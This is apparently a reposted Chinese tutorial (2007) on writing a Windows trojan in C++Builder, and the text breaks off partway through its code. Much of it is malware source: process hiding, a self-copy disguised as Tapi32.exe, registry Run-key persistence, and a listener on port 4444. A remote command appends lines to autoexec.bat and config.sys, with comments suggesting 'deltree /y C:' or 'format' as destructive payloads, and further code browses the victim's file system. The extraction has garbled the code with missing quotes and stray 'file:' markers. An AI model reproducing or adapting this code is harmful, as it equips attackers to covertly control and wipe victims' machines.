木马是如何编写的.docx

木马是如何编写的.docx

《木马是如何编写的.docx》由会员分享，可在线阅读，更多相关《木马是如何编写的.docx（20页珍藏版）》请在冰豆网上搜索。

木马是如何编写的

木马是如何编写的

阅读:

2307时间:

2007-7-315:

07:

11整理:

华夏黑盟

------------------------------------------------------------------

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布BackOrifice以来，木马犹如平地上的惊雷，使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

　　我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！

要知道，木马（Trojan）的历史是很悠久的：

早在AT&TUnix和BSDUnix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。

那时木马的主要方法是诱骗——先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。

国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。

直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

　　自己编写木马，听起来很Cool是不是？

！

木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。

为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

　　首先是编程工具的选择。

目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？

　　启动C++Builder5.0企业版，新建一个工程，添加三个VCL控件：

一个是Internet页中的ServerSocket，另两个是Fastnet页中的NMFTP和NMSMTP。

ServerSocket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。

Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（FileTransferProtocol文件传输协议）和SMTP（SimpleMailTransferProtocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

　　Form窗体是可视的，这当然是不可思议的。

不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。

因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

　　我们首先应该让我们的程序能够隐身。

双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。

这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。

因此，只要将我们的程序在进程数据库中用RegisterServiceProcess（）函数注册成服务进程（ServiceProcess）就可以了。

不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

　　首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORDdwVersion=GetVersion（）;

//得到操作系统的版本号

if（dwVersion>=0x80000000）

//操作系统是Win9x，不是WinNt

　{

　　typedefDWORD（CALLBACK*LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;

　　　　//定义RegisterServiceProcess（）函数的原型

　　　　HINSTANCEhDLL;

　　　LPREGISTERSERVICEPROCESSlpRegisterServiceProcess;

　　　hDLL=LoadLibrary（"KERNEL32"）;

　　　//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32.DLL

　　lpRegisterServiceProcess=（LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;

　　　　//得到RegisterServiceProcess（）函数的地址

　　　　lpRegisterServiceProcess（GetCurrentProcessId（）,1）;

　　　//执行RegisterServiceProcess（）函数,隐藏本进程

　　　FreeLibrary（hDLL）;

　　　//卸载动态链接库

　}

}

　　这样就终于可以隐身了（害我敲了这么多代码！

）。

为什么要判断操作系统呢？

因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。

接着再将自己拷贝一份到%System%目录下，例如：

C:

\Windows\System，并修改注册表，以便启动时自动加载：

{　

charTempPath[MAX_PATH];

//定义一个变量

GetSystemDirectory（TempPath,MAX_PATH）;

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString（TempPath）;

//格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile（ParamStr（0）.c_str（）,AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（）,FALSE）;

//将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=newTRegistry;

//定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE;

//设置主键为HKEY_LOCAL_MACHINE

Registry->OpenKey（"Software\\Microsoft\\Windows\\

CurrentVersion\\Run",TRUE）;

//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

　{

　　//如果以下语句发生异常，跳至catch，以避免程序崩溃

　　if（Registry->ReadString（"crossbow"）!

=SystemPath+"\\Tapi32.exe"）

　　　Registry->WriteString（"crossbow",SystemPath+"\\Tapi32.exe"）;

　　　//查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

　　　//如果不是，就写入以上键值和内容

　}

catch（...）

　{

　//如果有错误，什么也不做

　}

}

　　好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

　　接着选中ServerSocket控件，在左边的ObjectInspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。

再将Port填入4444，这是木马的端口号，当然你也可以用别的。

但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错^_^）。

你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTPControlPort）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

　　再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

　FILE*fp=NULL;

　char*content;

　inttimes_of_try;

　charTempFile[MAX_PATH];

　//定义了一堆待会儿要用到的变量

　sprintf（TempFile,"%s",AnsiString（SystemPath+AnsiString（"\\Win369.BAT"））.c_str（））;

　//在%System%下建立一个文本文件Win369.bat，作为临时文件使用

　AnsiStringtemp=Socket->ReceiveText（）;

　//接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！

接着就是修改目标机的各种配置了！

^_^首先我们来修改Autoexec.bat和Config.sys吧：

{

if（temp.SubString（0,9）=="editconf"）

　//如果接受到的字符串的前9个字符是“editconf”

　{

　　　intnumber=temp.Length（）;

　　　//得到字符串的长度

　　　intfile_name=atoi（（temp.SubString（11,1））.c_str（））;

　　　//将第11个字符转换成integer型，存入file_name变量

　　　//为什么要取第11个字符，因为第10个字符是空格字符

　　　content=（temp.SubString（12,number-11）+'\n'）.c_str（）;

　　　//余下的字符串将被作为写入的内容写入目标文件

　　　FILE*fp=NULL;

　　　charfilename[20];

　　　chmod（"c:

\\autoexec.bat",S_IREAD|S_IWRITE）;

　　　chmod（"c:

\\config.sys",S_IREAD|S_IWRITE）;

　　　//将两个目标文件的属性改为可读可写

　　　if（file_name==1）

　　　　sprintf（filename,"%s","c:

\\autoexec.bat"）;

　　　　//如果第11个字符是1,就把Autoexec.bat格式化

　　　elseif（file_name==2）

　　　　sprintf（filename,"%s","c:

\\config.sys"）;

　　　　//如果第11个字符是1,就把Config.sys格式化

　　　times_of_try=0;

　　//定义计数器

　　　while（fp==NULL）

　　　　{

　　　　　//如果指针是空

　　　　fp=fopen（filename,"a+"）;

　　　　//如果文件不存在，创建之；如果存在，准备在其后添加

　　　　//如果出错，文件指针为空，这样就会重复

　　　　times_of_try=times_of_try+1;

　　　　//计数器加1

　　　　if（times_of_try>100）

　　　　{

　　　　　　//如果已经试了100次了，仍未成功

　　　　　　Socket->SendText（"FailByOpenFile"）;

　　　　　　//就发回“FailByOpenFile”的错误信息

　　　　　　gotoEND;

　　　　　　//跳至END处

　　　　}

　　　　}

　　　fwrite（content,sizeof（char）,strlen（content）,fp）;

　　　//写入添加的语句，例如deltree/yC:

或者format/q/autotestC:

，够毒吧？

！

　　　fclose（fp）;

　　　//写完后关闭目标文件

　　　Socket->SendText（"Sucess"）;

　　　//然后发回“Success”的成功信息

　}

}

　　你现在可以通过网络来察看目标机上的这两个文件了，并且还可以向里面随意添加任何命令。

呵呵，这只不过是牛刀小试罢了。

朋友，别走开

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲啰：

{

elseif（temp.SubString（0,3）==dir）

{

file:

//如果前3个字符是“dir”

intRead_Num;

char*CR_LF=\n;

intattrib;

char*filename;

DIR*dir;

structdirent*ent;

intnumber=temp.Length（）;

file:

//得到字符串的长度

AnsiStringDir_Name=temp.SubString（5,number-3）;

file:

//从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if（Dir_Name==）

 {

file:

//如果目录名为空

 Socket->SendText（FailByOpenDIRsName）;

 file:

//返回“FailByOpenDIRsName”信息

 gotoEND;

 file:

//跳到END

 }

char*dirname;

dirname=Dir_Name.c_str（）;

if（（dir=opendir（dirname））==NULL）

 {

file:

//如果打开目录出错

 Socket->SendText（FailbyyourDIRsname!

）;

 file:

//返回“FailByYourDIRsName”信息

 gotoEND;

 file:

//跳到END

 }

times_of_try=0;

while（fp==NULL）

 {

file:

//如果指针是NULL

 fp=fopen（TempFile,w+）;

 file:

//就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

 times_of_try=times_of_try+1;

 file:

//计数器加1

 if（times_of_try>100）

  {

file:

//如果已经试了100次了，仍未成功（真有耐心！

）

  Socket->SendText（FailByOpenFile）;

  file:

//就发回“FailByOpenFile”的错误信息

  gotoEND;

  file:

//并跳到END处

  }

 }

while（（ent=readdir（dir））!

=NULL）

 {

file:

//如果访问目标目录成功

  if（*（AnsiString（dirname））.AnsiLastChar（）!

=\\）

  file:

//如果最后一个字符不是“\”，证明不是根目录

  filename=（AnsiString（dirname）+\\+ent->d_name）.c_str（）;

  file:

//加上“\”字符后将指针指向目录流

  else

  filename=（AnsiString（dirname）+ent->d_name）.c_str（）;

  file:

//如果是根目录，则不用加“\”

  attrib=_rtl_chmod（filename,0）;

  file:

//得到目标文件的访问属性

  if（attrib&FA_RDONLY）

file:

//“&”字符是比较前后两个变量，如果相同返回1,否则返回0

  fwrite（R,sizeof（char）,3,fp）;

  file:

//将目标文件属性设为只读

  else

  fwrite（ ,sizeof（char）,3,fp）;

  file:

//失败则写入空格

  if（attrib&FA_HIDDEN）

  fwrite（H,sizeof（char）,1,fp）;

  file:

//将目标文件属性设为隐藏

  else

  fwrite（,sizeof（char）,1,fp）;

  file:

//失败则写入空格

  if（attrib&FA_SYSTEM）

  fwrite（S,sizeof（char）,1,fp）;

  file:

//将目标文件属性设为系统

  else

  fwrite（,sizeof（char）,1,fp）;

  file:

//失败则写入空格

  if（attrib&FA_ARCH）

  fwrite（A,sizeof（char）,1,fp）;

  file:

//将目标文件属性设为普通

  else

  fwrite（,sizeof（char）,1,fp）;

  file:

//失败则写入空格

  if（attrib&FA_DIREC）

  fwrite（